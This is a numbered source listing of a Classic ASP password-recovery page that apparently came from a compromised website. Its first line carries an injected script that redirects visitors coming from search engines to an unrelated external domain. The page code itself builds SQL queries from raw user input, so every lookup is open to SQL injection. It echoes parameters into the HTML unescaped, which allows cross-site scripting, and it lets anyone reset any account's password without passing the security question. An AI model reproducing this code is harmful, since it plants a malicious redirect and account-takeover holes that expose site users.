d:\wwwroot\wuchunhua\zhuce\userfind.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><%
002:    if request("find")="" then
003:       response.redirect "userfind.asp?find=form"
004:    end if
005: %>
006: <!--#include file="conn.asp"-->
007: <!--#include file="inc/md5.asp"-->
008: <html>
009: <head>
010: <title>找回密码</title>
011: <!--mstheme--><link rel="stylesheet" type="text/css" href="../_themes/sky/sky1011-106.css"><meta name="Microsoft Theme" content="sky 1011, default">
012: </head>
013: <body>
014:   
015: <%if request("find")="form" then '找回密码初始显示界面%>
016: <form method="post" action="userfind.asp?find=username">
017: <p align="center">找回密码</p>
018: <p align="center">请输入您的用户名: <input type="text" name="username" /> <input type="submit" value="提交" /> <input type="reset" value="重置" /></p>
019: </form>
020: <%end if%>
021:
022: <%if request("find")="pass" then '找回密码密码提示与回答界面%>
023:    <%
024:       if request("username")="" then
025:          response.write "<script>alert('您非法的设置了参数!');history.back();</script>"
026:          response.end
027:       end if
028:    %>
029: <form method="post" name="form" action="userfind.asp?find=pass_check">
030: <input type="hidden" name="username" value="<%=request("username")%>" />
031: <p align="center">找回密码</p>
032: <p align="center">您的用户名: <%=request("username")%></p>
033: <p align="center">您的密码提问是: <%=request("passt")%></p>
034: <p align="center">您的密码回答是: <input type="text" name="passd" value="" size="14" /></p>
035: <p align="center"><input type="submit" value="提交" /></p>
036: </form>
037: <%end if%>
038:
039: <%if request("find")="password" then '重新输入密码界面%>
040:    <%
041:       if request("username")="" then
042:          response.write "<script>alert('您非法的设置了参数!');history.back();</script>"
043:          response.end
044:       end if
045:    %>
046: <form method="post" name="form" action="userfind.asp?find=password_mof">
047: <input type="hidden"  name="username" value="<%=request("username")%>">
048: <p align="center">您的用户名: <%=request("username")%></p>
049: <p align="center">请输入您的新密码: <input type="password" name="password" /></p>
050: <p align="center"><input type="submit" value="修改密码" /></p>
051: </form>
052: <%end if%>
053:
054:
055: </body>
056: </html>
057: <%
058:    '提交密码
059:    if request("find")="username" then
060:       if request("username")="" then
061:          response.write "<script>alert('(您没有填写用户名)\n\n(或者非法的设置了参数)!');history.back();</script>"
062:          response.end
063:       end if
064:       dim rs,sql
065:       set rs=server.createobject("adodb.recordset")
066:       sql="select * from users where username='"&request("username")&"'"
067:       rs.open sql,conn,1,1
068:       
069:       if rs.eof or rs.bof then '如果不存在密码返回
070:          rs.close
071:          set rs=nothing
072:          conn.close
073:          set conn=nothing
074:          response.write "<script>alert('用户名不存在,请返回!');history.back();</script>"
075:          response.end
076:       else                        '如果存在密码把密码提示提交出
077:          dim passt
078:          passt=rs("passt")
079:          rs.close
080:          set rs=nothing
081:          conn.close
082:          set conn=nothing
083:          response.redirect "userfind.asp?find=pass&username=" & request("username") & "&passt=" & passt
084:          response.end
085:       end if
086:    end if
087:   
088:    '检验密码回答是否正确
089:    if request("find")="pass_check" then
090:       if request("username")="" then
091:          response.write "<script>alert('您非法的设置了参数!');history.back();</script>"
092:          response.end
093:       end if
094:       dim rs2,sql2
095:       set rs2=server.createobject("adodb.recordset")
096:       sql2="select * from users where username='"&request("username")&"'"
097:       rs2.open sql2,conn,1,1
098:          if rs2("passd")=request("passd") then
099:             rs2.close
100:             set rs2=nothing
101:             conn.close
102:             set conn=nothing
103:             response.redirect "userfind.asp?find=password&username=" & request("username")
104:          else
105:             rs2.close
106:             set rs2=nothing
107:             conn.close
108:             set conn=nothing
109:             response.write "<script>alert('对不起,您的密码回答不正确,请返回!');history.back();</script>"
110:          end if
111:    end if
112:   
113:    '验证密码是否合法,如果合法,修改密码
114:    if request("find")="password_mof" then
115:       if request("password")="" or len(request("password"))<6 then
116:          response.write "<script>alert('密码不合法,可能是空或是小于6位的原因!');history.back();</script>"
117:       else
118:          dim rs3,sql3
119:          set rs3=server.createobject("adodb.recordset")
120:          sql3="select * from users where username='"&request("username")&"'"
121:          rs3.open sql3,conn,3,3
122:          rs3("password")=md5(request("password"))
123:          rs3.update
124:          rs3.close
125:          set rs3=nothing
126:          response.write "<script>alert('修改完毕,请确认重新登陆!');window.location='index.asp'</script>"
127:       end if
128:    end if
129: %>
130:
131:

---